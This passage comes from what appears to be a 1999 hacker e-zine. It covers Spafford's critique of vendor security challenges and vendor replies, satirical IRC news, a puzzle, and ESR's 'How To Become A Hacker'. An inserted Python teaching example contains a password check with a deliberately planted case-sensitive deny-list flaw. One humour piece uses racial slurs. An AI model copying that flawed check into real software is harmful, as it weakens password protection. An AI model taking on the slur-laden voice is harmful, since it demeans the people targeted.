training". (I've argued this point in more detail in "Are Computer
Break-Ins Ethical?", Journal of Systems and Software, Jan 1992, 17(1).)

Good security should be carefully designed in and tested using
established methods. Tiger teams have a role, but using them
(especially ad hoc teams) as a major means of establishing safety is
negligent. Security "contests" to demonstrate a system are worse, and
should be viewed negatively by potential customers. It should be
generally recognized that such contests cannot establish more than
cursory confidence in a product, are not a good means of testing, and
actually create a climate that may encourage or enable people to try to
break the product after it is in use.

If I was a potential customer of any security product, which of the
following, somewhat exaggerated approaches would be more likely to
convince me that a company had its act together? Which one is the
company more likely to be seeking to sell based on smoke and mirrors?
o Approach A: Our product was coded by a bunch of really talented
hackers and former system crackers who learned everything they know
on the IRC. We put our product up on the Internet for 6 months, and
offered a nifty backpack and some money to anyone who could break
in. No one claimed the prize. Obviously, ours is a superior
product.
o Approach B: Our company is certified as an ISO 9000 company. We
used formal software engineering approaches to design and build our
product, ending in full functional testing, D-U path testing, and
statement coverage to 98%. We also hired well-known independent
security experts A, B, and C under non-disclosure to examine the
code and identify weaknesses, and then conduct field trials. Company
X and University Y have also had the opportunity to examine and test
our product, and none of them have found flaws.

Approach "B" is clearly the one we want to encourage. Approach "A"
encourages cycles of "penetrate and patch" and that is what is wrong
with most mass-market software available today. However, vendors claim
that Approach "A" is what sells more product than Approach "B," in part
because it seems to inspire more confidence, and in part because it is
cheaper to produce software if they don't use an approach like "B".

If we, as a community and a profession, want better quality and more
trustworthy products, we must begin to demonstrate it. The best way is
in the marketplace, by showing a willingness to buy based on substance,
and not flash. Saying "no" to attempts to sell us products based on
"hacker challenges" is one way to do that.
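Schneier's essay above ("Do ten people, each working 100 hours ... count as 1000 hours of analysis? Or did they all try the same things?") and Spafford's first bullet (10,000 calculator tests, 9,000 of them addition with zero) make the same point: the number of attempts says nothing about what was covered. The following Python example is added here to make that concrete; it is not code from either author. It exercises a constructed password-policy check with one planted defect (a case-sensitive deny-list comparison) first with 10,000 random black-box attempts drawn from a narrow input distribution, then with six branch-directed tests, and reports how many of the check's branches each approach actually reached. The policy, the deny-list, the branch labels and all inputs are hypothetical, built only for this illustration.

```python
# Added example: attempt count versus branch coverage.
# Everything here (policy, deny-list, inputs) is constructed for illustration.
import random
from collections import Counter

# Hypothetical deny-list of passwords the policy is meant to reject.
DENY_LIST = {"password1", "letmein123", "qwerty123"}

# Every branch the checker can take, so coverage can be reported as a ratio.
ALL_BRANCHES = {"too_short", "len_ok", "no_digit", "digit_ok",
                "no_alpha", "alpha_ok", "denied", "accepted"}


def policy_accepts(pw, hits):
    """Constructed policy with one planted defect: the deny-list comparison
    is case-sensitive, so 'PASSWORD1' is accepted although 'password1' is
    rejected. `hits` is a Counter recording which branches executed."""
    if len(pw) < 8:
        hits["too_short"] += 1
        return False
    hits["len_ok"] += 1
    if not any(c.isdigit() for c in pw):
        hits["no_digit"] += 1
        return False
    hits["digit_ok"] += 1
    if not any(c.isalpha() for c in pw):
        hits["no_alpha"] += 1
        return False
    hits["alpha_ok"] += 1
    if pw in DENY_LIST:  # defect: should be `pw.lower() in DENY_LIST`
        hits["denied"] += 1
        return False
    hits["accepted"] += 1
    return True


def flaw_exposed(pw, accepted):
    """Test oracle: a deny-listed value in different letter case must not
    be accepted. Returns True only when an input demonstrates the defect."""
    return accepted and pw.lower() in DENY_LIST and pw not in DENY_LIST


def random_challenge(attempts=10000, seed=1):
    """Ad hoc probing: random lowercase/digit strings of length 3..12, the
    kind of input a crowd of casual challengers tends to produce. Returns
    (set of branches reached, whether any attempt exposed the defect)."""
    rng = random.Random(seed)
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    hits = Counter()
    exposed = False
    for _ in range(attempts):
        pw = "".join(rng.choice(alphabet) for _ in range(rng.randint(3, 12)))
        if flaw_exposed(pw, policy_accepts(pw, hits)):
            exposed = True
    return set(hits), exposed


def structured_tests():
    """Branch-directed testing: one input per branch, plus the boundary a
    deny-list actually has to get right (same word, different case)."""
    cases = [
        "short1",         # too_short
        "abcdefgh",       # len_ok -> no_digit
        "12345678",       # digit_ok -> no_alpha
        "correct1horse",  # alpha_ok -> accepted
        "password1",      # denied
        "PASSWORD1",      # case variant of a denied value: exposes the defect
    ]
    hits = Counter()
    exposed = False
    for pw in cases:
        if flaw_exposed(pw, policy_accepts(pw, hits)):
            exposed = True
    return set(hits), exposed


def coverage_report():
    """Side-by-side figures for the two approaches."""
    rand_branches, rand_found = random_challenge()
    struct_branches, struct_found = structured_tests()
    return {
        "random_attempts": 10000,
        "random_branches": len(rand_branches),
        "random_found_flaw": rand_found,
        "structured_attempts": 6,
        "structured_branches": len(struct_branches),
        "structured_found_flaw": struct_found,
        "total_branches": len(ALL_BRANCHES),
    }


if __name__ == "__main__":
    for key, value in coverage_report().items():
        print(f"{key}: {value}")
```

Run directly, it prints the two sets of figures. The random run never reaches the `denied` branch at all, because lowercase random strings almost never coincide with a deny-listed word, so the case-handling defect sitting behind that branch cannot surface no matter how many attempts are made; the six structured inputs reach all eight branches and the last one exposes it. The number a reviewer should ask a vendor for is the branch (or path) coverage of the testing, not the headcount of challengers.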

Replies:
++++++++
Sameer Parekh, Community ConneXion (sameer@c2.org, URL:
http://www.c2.org/):

Most of Gene's points are very valid, and I agree with them. His points
are aimed at challenges promoted by a company in order to show that a
product is secure. On the other hand, the Community ConneXion
challenges are promoted in order to show that a product is *insecure*.

It's easy to prove insecurity, but hard to prove security. The
vendor-supported challenges are trying to prove security, which is
rather misguided. In proving insecurity, though, our challenges are
rather simple, as they only require one counter-example to prove
that a system is insecure.
- - - - - - -
Jon Wiederspan, ComVista (jon@comvista.com URL:
http://www.comvista.com/) :

We received a very similar letter from Mr. Spafford when we first began
our contest and posted an extensive reply on our site while it was in
operation. I will summarize the main points for Cipher readers:

1) Mr. Spafford says that these challenges are a poor way of testing
software. That is true; however, it was never our purpose to test the
software by running a challenge. The testing has been completed or we
would not have been confident enough to place $10,000 on the line. The
main purpose of our security challenge was to promote awareness of the
existence of security options for Macintosh servers. It was never
intended as proof of the security of the system or to replace rigorous
testing.

2) Mr. Spafford says that these contests promote hacking. We disagree
with that entirely. By his argument, the Daytona 500 is responsible for
people driving too fast on highways. I think there are people who drive
as if they are on a race track (one passed me this morning on my way to
work) but it is clear that rules on the highway are different from
rules on the race track and no court in the land would let a person get
away with arguing differently. We clearly stated on our site the
limitations of the contest including a warning that we were not
condoning similar attacks on systems other than the one provided for
the contest.

3) Mr. Spafford says that these contests make it easier to break other
systems. Mr. Spafford is looking in the wrong place. Bulletin boards,
newsletters, Web sites and more all exist with information on how to
hack into systems. Books have been written on the subject, movies made,
and special investigative reports offered on television all on the
subject. Writing about what failed on our site will not help hackers
significantly. Our site also did not provide free practice to hackers
because *none of the attempts worked*. Practice is useless if you do
not at some point succeed.

4) Mr. Spafford says that it is wrong to test things by trying to break
them. I don't think he thought about what he was saying there. What is
beta testing but an attempt to find where software will break? Stress
testing for metal structures? Crash testing cars? It is a fact of life
that part of testing a product is to find where it will fail, which
means trying actively to break the product in a variety of ways.

In summary, it is our opinion that Mr. Spafford's letter has no bearing
on the challenge that we had online. He probably would have been better
served by investigating our site more thoroughly before writing the
letter.
- - - - - -
Jeff Weinstein, Netscape (jsw@netscape.com, URL:
http://home.netscape.com/people/jsw)

My quick reaction is that the Netscape Bugs Bounty is not a "hacker
challenge". It is a way to reward users for helping to find bugs that
get past us. I don't think that we make any claims such as "our
product must be secure because no one claimed our hacker prize". We
also don't view the bug bounty as a replacement for our own QA efforts,
but a supplement to it.
- - - - - -
Secure Computing Corporation, sponsors of the Sidewinder challenge reported
in Cipher EI#6, declined to comment.


AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$

www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre


* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* One of our sponsors, visit them now: http://www.csoft.net                  *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////


@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't be happy, worry.

IRC Security: Who to Trust
Contributed by siko
Thursday - March 25, 1999. 02:35AM GMT

These days the IRC waters can be just as dangerous as a raging inferno.
Op the wrong nick and you could lose an entire channel in a matter of
seconds.

"Anyone can download a script these days and deop the regular channel
members these days. The old days you had to load up telnet.exe, these days
you type /hack and you are good to go," says IRC Security Expert Mark
Winters. "If you are really skilled, you could even do what is known as 'riding
a split'."

Certain IRC Networks are not prone to this type of hostile attack, such as
Dalnet and Undernet due to channel bots employed by the IRC network to
prevent such actions. The only trade off in the matter is Dalnet and Undernet
fucking blow.

A recent example of a hostile takeover would include a short takeover of
#wsvw1u, thought to be masterminded by 'vize' of Efnet. Vize held ops in the
channel for several minutes while attempting to harass and threaten Innerpulse
writer siko. Siko did not fret, however, since he noticed ops had been
restored during the trash talk session vize was putting on. Upon being banned
from #wsvw1u, vize entered #innerpulse, which was at the time opless to hurt
the self-respect level of channel members by calling them 'lame.' This highly
original insult offended one member so much, he opened a windows nuker
and proceeded to nuke vize 8 times before finally parting the channel with the
message "you will all be owned" (not in those letters... y0u w1ll 4ll b3
0wned).

What type of prevention are IRCOps on Efnet taking to stop hostile channel
takeover artists like this one? Innerpulse contacted #us-opers and asked for
answers.

"It is believed that users are responsible for their own channels and their
channels well being," said Disciple.

After several minutes, Innerpulse learned Disciple was not an IRCOp and
stopped giving a shit about his opinions.

Efnet Information


Ma$e Signs Deal With CDNow.com
Contributed by siko
Thursday - March 25, 1999. 01:46AM GMT

Bad Boy rap artist, Ma$e, has signed a deal with CDNow.com to write
and perform music aimed at Internet technologies. They will be compiled and
released under the upcoming album 'Internet World', second to his platinum
album, 'Harlem World'.

"I was excited about the offer because sometimes I'm just kickin it with my
homies on IRC and I get these ideas. I plan to rap about the trials and
tribulations brought on by the Internet, including taking channels on IRC,
packeting AntiOnline, playing all the ladies on America Online, among other
things," said Ma$e yesterday at an official press conference. "Hopefully this
will let the world know about the struggles that exist on today's Internet."

Ma$e's first song that he has started production on in the studio is called
'Lookin at Me'. He shows off his lyrical prowess with lines such as 'Soon as I
join the channel people is like damn who is he, and please, I hope he don't
nuke me'. Another verse taking aim at 'lamers' goes: "And if you are a lamer,
and you got a net girlie, don't be real committed, because Ma$e will net-bang
her."

Staying true to the game, there are several skits included on the cd. Among
the planned skits are Ma$e accidentally messing up his AOL Instant
Messages and telling Shania he will meet her at 7pm when he meant to send
the Instant Message to Faruka, a real black queen.

Ma$e describes his everyday troubles waking up and signing on in his song
'Niggaz Wanna DoS'. Ma$e shows he is a lyrical soldier with lines such as
'You wanna fuck with Ma$e, you'll get your wig rocked nigga, You wanna
fuck with Innerpulse, You'll get your IP nuked nigga.'

The album should be out in late July, 1999.


Doonesbury Author Reveals Source of
Information
Contributed by siko
Wednesday - March 24, 1999. 09:11PM GMT

Doonesbury is a well known comic strip that runs in thousands of
publications nationwide. The past couple strips run have included jargon from
the cyberculture underground, such as script kiddie and newbie. What started
as a portal to the public has swiftly turned into a mess.

"In an effort to show off my computer skills, I used the expert term 'tracing the
exploit to his isp number'", said G.B. Trudeau, the writer of Doonesbury. "But I
guess after my latest strip it's kind of hard to hide the fact that I figured this out
in #rootworm of Undernet."

"He wanted to know about computer crimes so he could showcase them in
this week's strip. So basically I just told him everything I knew", said one
hacker who goes by the handle 'vortek'. "I think it's cool the public will
understand what goes on behind the scenes. I mean, attention is the ultimate
goal of a 13 year old abused child.."

Innerpulse, although never a fan of Doonesbury in the past, has seen
computer-related material in Doonesbury before. Images portraying long-nosed,
bony-faced geeks with glasses working hard at their computers 'hacking' are
nothing new to the strip. What is new to the strip is the legal action being
brought against it by AntiOnline.com for its illegal use of the term "exploit", a
term they believe they own rights to.

Doonesbury Comic


Innerpulse Could 'Use more food' at the
Office
Contributed by siko
Wednesday - March 24, 1999. 08:00AM GMT

Innerpulse Media has decided to search for a second sponsor in hopes of
making a small profit to buy food for needy children. You can keep
Innerpulse.com running by clicking the banner on the page. Thank you, and
look for the new Innerpulse, dubbed the Innerpulse Network, coming January
16.. I mean 3 months later (just like antionline).


http://www.segfault.org/story.phtml?mode=2&id=36faccb8-03739440


NATO authorizes airstrikes on hackers

Silicon Valley, California -- Chat rooms were unusually deserted, spammers went on panicked last-minute
mail-bombing sprees and bomb shelters filled to overflowing today as gloom engulfed hackers waiting for
NATO strikes.

Hackers showed a mix of fear and defiance toward the Western military alliance, aware it could strike at any
moment against strategic hacker targets after yet another embarrassing vandalism of a U.S. Department of
Defense website.

"This waiting for strikes is killing me," said w4r3z_f14r3, a 22-year-old student in the controversial Computer
Science department at the Massachusetts Institute of Technology. "If they want to bomb us, they should do it
now so I can get back to cracking Afterlife II."

Graphics illegally uploaded to an Associated Press website accompanied a note which stated, "F1n1$h 7h1Z
60mb1n9 0r f4c3 my uur47h, I 4m l337!!! H4x0rs un173!" The web server was quickly downed in a flurry of
flamewars over the proper use of the word 'hacker' versus 'cracker' in the page.

Many college-age hackers stayed home rather than attending school, though most admit they would have
stayed home anyway.

Y2K websites issued detailed FAQs to threatened hackers in case of bombing, including information on how
long canned goods stay fresh in underground shelters, how to fix a misfiring diesel generator, and how to sow
grain in the field with a plow and oxen.

Bomb shelters, unused in emergency since DefCon 4, were cleaned up during the last NATO threat in August,
when the alliance previously announced its intention to launch airstrikes at the notorious hacker group Cult of
the Dead Cow. Most shelters have been turned into underground bunkers featuring ISDN lines with
triple-redundancy backups, as once the hackers moved in, they found the absence of sunlight and social
involvement enjoyable.

Despite the danger, supporters of hard-line hackers were defiant.

"NATOns will fire their missiles from a distance," said Lord Kreel, an NT cracker. "Meanwhile, I will be
cracking into the Pentagon with my friends in the Lackeys of Terror. We plan to install Windows on all of their
computers, which will cripple their systems beyond repair."

Opponents of "black hat" hacking think NATO strikes will actually increase the popularity of cracking among
the techno-elite, but cement the popular image of the hacker as a no-good techie pirate bent on stealing credit
card numbers and eating babies.

"Now, [crackers will] attack all the media sites, plastering the entire web with links to porno and warez sites,
and lag the whole net to hell", said hacker Frodo Majere. "If NATO thinks they will bend hackers with bombs,
they are dead wrong."

Supporters of the infamous jailed hacker Kevin Mitnick have reportedly been preparing to strike at well-known
pro-NATO companies and military organizations as soon as the first NATO bomb lands on hacker territory.

"We'll introduce Y2K bugs to systems where you'll never find them. We will end the disgusting
greed-infested system of monopolist capitalism by freeing information forever. Linux is the One, True God,"
said one hacker, before he was shot and killed by an enraged fanatic wearing a red "GNU NOT Linux"
headband, symbol of the underground terrorist organization FSF. A press release issued by the FSF's guerrilla
leader, known only as RMS, claimed responsibility for the killing.

NATO's secretary-general Javler Selena authorized airstrikes against known hacker sites on Tuesday, after
hackers on the IRC channel #2600 rebuffed a last-ditch peace offer and gave out free root accounts on the
whitehouse.gov server.

"In the past, computer security was a war of escalation between system administrators and joy-riding
hackers," said a spokesperson for the anti-hacker group Freedom Through Oppression. "It's high time we
brought the war to the instigators and bombed these hacker scum back to the Stone Age. To make the Internet
safe for everyone, we must squash dissension once and for all. Countries have been nuked for less."

"If you don't stand up to the theft of intellectual property of innocent companies such as SysMicrosoft and
AppMicrosoft, you threaten American competitiveness and the ability to innovate," said President Gates, as
he sought -- and got -- support from congressional leaders for military action.

"We must halt the hackers and save the Internet for our children and the future of our country. The dirty,
despicable hackers will no longer disrupt websites to make fun of our institutions, or pollute the Information
Superhighway with filthy swear words," said former Vice President Al Gore, founder of the Internet, before he
suddenly toppled over and dumped core. "NTLDR not found. INVALID_BOOT_DEVICE in kernel32.exe
006383dhX00029393."
Posted on Fri 26 Mar 00:21:38 1999 GMT
Written by Potato <meersan@linuxmail.org>


Puzzle:
~~~~~~

How far apart are these two network cards?


---------------------| |-----------------------
| | | |
| card1 [=]-- coax --[=] card2 |
| | - | - | |
-------IIIIIIIIIIIIII| - \/ - |IIIIIIIIIIIIIIII-------


Hints: - The connectors do not count
       - the answer is in inches
       - yes it is a 'trick' question
       - yes they are network cards
       - it is coaxial ethernet 10Mb/s
       - the drop in the loop is 25'


@HWA

HOW.TO How to hack part 3
~~~~~~~~~~~~~~~~~~

To be continued (probably) in a future issue... if time permits
and inclination is prevalent. ie: if & when I feel like it.. :p

Meanwhile read this:

http://www.nmrc.org/faqs/hackfaq/hackfaq.html

And especially, this:

http://www.tuxedo.org/~esr/faqs/hacker-howto.html

(published below in its entirety due to relevance
and eloquence)...

$Date: 1999/03/26 09:18:00 $


(Translations into French, Spanish, Italian, German, Japanese, Korean, Swedish, Portuguese and Russian are available at the site.)

How To Become A Hacker

Why This Document?

As editor of the Jargon File, I often get email requests from enthusiastic network newbies asking (in effect) "how can I learn to be a wizard hacker?". Oddly enough
there don't seem to be any FAQs or Web documents that address this vital question, so here's mine.

If you are reading a snapshot of this document offline, the current version lives at http://www.tuxedo.org/~esr/faqs/hacker-howto.html.

What Is A Hacker?

The Jargon File contains a bunch of definitions of the term `hacker', most having to do with technical adeptness and a delight in solving problems and overcoming
limits. If you want to know how to become a hacker, though, only two are really relevant.

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing
minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term `hacker'. Hackers built the Internet. Hackers made the Unix
operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and
other people in it know who you are and call you a hacker, you're a hacker.

The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music --
actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them "hackers" too -- and
some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and
attitudes of software hackers, and the traditions of the shared culture that originated the term `hacker'.

There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into
computers and phreaking the phone system. Real hackers call these people `crackers' and want nothing to do with them. Real hackers mostly think crackers are
lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you
an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word `hacker' to describe crackers; this irritates real hackers no
end.

The basic difference is this: hackers build things, crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding
out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

The Hacker Attitude

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you
have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these
things is important for you -- for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the
mind-set of masters -- not just intellectually but emotionally as well.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical
delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving
problems, sharpening your skills, and exercising your intelligence.

If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is
sapped by distractions like sex, money, and social approval.

(You also have to develop a kind of faith in your own learning capacity -- a belief that even though you may not know all of what you need to solve a problem, if you
tackle just a piece of it and learn from that, you'll learn enough to solve the next piece -- and so on, until you're done.)

2. Nobody should ever have to solve a problem twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out
there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share
information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other
hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's consistent to use your hacking skills to support a
family or even get rich, as long as you don't forget you're a hacker while you're doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing
what only they can do -- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else
(especially other hackers).

(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order
to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice -- nobody who can think should ever be forced into
boredom.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by -- and, given the
way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it
smother you and other hackers.

(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to
get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is
not on offer.)

Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing -- they only like `cooperation' that they control. So
to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you
have to be willing to act on that belief.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion
athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.

Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence --
especially competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at
demanding skills that involve mental acuteness, craft, and concentration is best.

If you revere competence, you'll enjoy developing it in yourself -- the hard work and dedication will become a kind of intense play rather than drudgery. And that's
vital to becoming a hacker.

Basic Hacking Skills

The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have
before any hacker will dream of calling you one.

This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine
language, and didn't until recently involve HTML. But right now it pretty clearly includes the following:

1. Learn how to program.

This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well
documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects.

But be aware that you won't reach the skill level of a hacker or even merely a programmer if you only know one language -- you need to learn how to think about
programming problems in a general way, independent of any one language. To be a real hacker, you need to have gotten to the point where you can learn a new
language in days by relating what's in the manual to what you already know. This means you should learn several very different languages.

If you get into serious programming, you will have to learn C, the core language of Unix (though it's not the one to try learning first thing). Other languages of
particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system
administration, so that even if you never write Perl you should learn to read it. LISP is worth learning for the profound enlightenment experience you will have when
you finally get it; that experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot.

It's best, actually, to learn all four of these (Python, C, Perl, and LISP). Besides being the most important hacking languages, they represent very different
approaches to programming, and each will educate you in valuable ways.

I can't give complete instructions on how to learn to program here -- it's a complex skill. But I can tell you that books and courses won't do it (many, maybe most of
the best hackers are self-taught). What will do it is (a) reading code and (b) writing code.

Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things
yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy
you see in your models.

Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has
changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to
our next topic...

2. Get one of the open-source Unixes and learn to use and run it.

I'm assuming you have a personal computer or can get access to one (these kids today have it so easy :-)). The single most important step any newbie can take
towards acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes, install it on a personal machine, and run it.

Yes, there are other operating systems in the world besides Unix. But they're distributed in binary -- you can't read the code, and you can't modify it. Trying to learn
to hack on a DOS or Windows machine or under MacOS is like trying to learn to dance while wearing a body cast.

Besides, Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without
understanding it. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers aren't happy about
it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.)

So, bring up a Unix -- I like Linux myself but there are other ways (and yes, you can run both Linux and DOS/Windows on the same machine). Learn it. Run it.
Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, Lisp, Python, and Perl) than any
Microsoft operating system can dream of, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master
hacker.

For more about learning Unix, see The Loginataka.

To get your hands on a Linux, see the 'Where can I get Linux' page.

3. Learn how to use the World Wide Web and write HTML.

Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how
non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit is changing the world. For this reason alone (and a lot of
other good ones as well) you need to learn how to work the Web.

This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how
to program, writing HTML will teach you some mental habits that will help you learn. So build a home page.

But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content
sludge -- very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page).

To be worthwhile, your page must have content -- it must be interesting and/or useful to other hackers. And that brings us to the next topic...

Status in the Hacker Culture

Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether
your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.

Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until
other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (now gradually decaying but
still potent) against admitting that ego or external validation are involved in one's motivation at all.

Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by
having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.

There are basically five kinds of things you can do to be respected by hackers:

1. Write open-source software.

The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources to the whole hacker
culture to use.

(We used to call these works ``free software'', but this confused too many people who weren't sure exactly what ``free'' was supposed to mean. Many of us now
prefer the term ``open-source'' software).

Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone
uses them.

2. Help test and debug open-source software

They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the
debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize
problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can
make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance.

If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test
programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on.

3. Publish useful information.

Another good thing is to collect and filter useful and interesting information into Web pages or documents like FAQs (Frequently Asked Questions lists), and make
those generally available.

Maintainers of major technical FAQs get almost as much respect as open-source authors.

4. Help keep the infrastructure working.

The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There's a lot of necessary but unglamorous work that needs
done to keep it going -- administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.

People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing
them shows dedication.

